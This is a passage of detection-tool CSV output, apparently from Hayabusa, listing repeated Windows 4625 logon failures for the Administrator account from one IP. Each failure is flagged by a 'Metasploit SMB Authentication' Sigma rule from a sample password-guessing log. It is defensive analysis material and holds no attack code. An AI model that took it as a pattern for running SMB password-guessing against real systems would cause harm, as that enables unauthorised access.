Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.834 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wObt647cIBPiVaZi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.834 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.873 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nYDe1L7NNxDGQ0Vt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.873 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.927 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mXroClxv7B0aCTYv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.927 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.973 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kCVah2QOH1hMSV76 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.973 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.020 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2HjD65Xy4Hppim2l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.020 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.065 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xwmEQxC4iTcF4aFu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.065 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.114 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q3QxOH7ok8RR068t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.114 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dJFj6Ckw1HdK9w52 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.164 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Qqu3Im4HXQNyGnYm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.209 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bk5dmjQDnpSlREum : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.248 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.279 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Pk4BvYgXBR2whf80 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.279 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.327 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i6n1su2TUr7ONQr4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.327 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.368 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: givsEAGfG0smN9Re : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.368 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.418 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i2YuM0i7a2QuY7xb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.418 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.470 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xuocQPZpd91adY0E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.470 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.541 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PvGB1dZrfDWyZoqs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.541 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.588 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w4oi8iL88rJo7g2Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.588 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.676 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cF3OUnytXi4NjvqB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.676 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.725 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WKkJcp3TYj31iJUM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.725 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: G0E44RVqAE1feU0b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.760 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ny5LCb1qOIUhxOPY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9jcDgzzqH26DjQ1k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.840 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.885 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yil94cFkU6UP24SK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.885 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.927 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bkdVHF3vggCcuNdn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.927 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4dRRI2CS3aVIX4nX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.964 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: chDZq3VgxIE2mRb9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.004 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.046 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HLVvgMmqLXKZADON : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.046 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i4avO2AJSlNb0IUL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.080 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mdo5CvycGvGhn33y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.128 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.171 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: heJfjLl1vbX6lMjZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.171 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wOP1E6hd4Jtj4gob : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.209 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xa7kMCNz0bEGTBqX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.248 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.293 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HSxTQ4HsZt2DeYVe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.293 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.341 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YxHpSQwFSV4hveVM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.341 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n3OwzSPomxZLoCe6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.372 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e9IfwDZIfYT6A50K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.416 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.463 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JOf6DbRX4zlNqLdb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.463 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 00kXrnJNH40NyoYL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.508 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.549 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nsNHcb9pnpdRgeL7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.549 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ucMhgxMXy9Ch1jNm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.592 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Cfi3ZaLTECJgjM9x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.637 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: usugjEEBHlhJvOyu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.680 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WQ1pM2CVLt5ITVD5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.720 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.746 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NIboW7hNljF3HPpk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.746 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.795 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rOk5W4rkSYRRw4xS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.795 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.858 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AJTfcwd8rnFc06iF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.858 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.930 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6sm415W5zkvjdnTV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.930 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 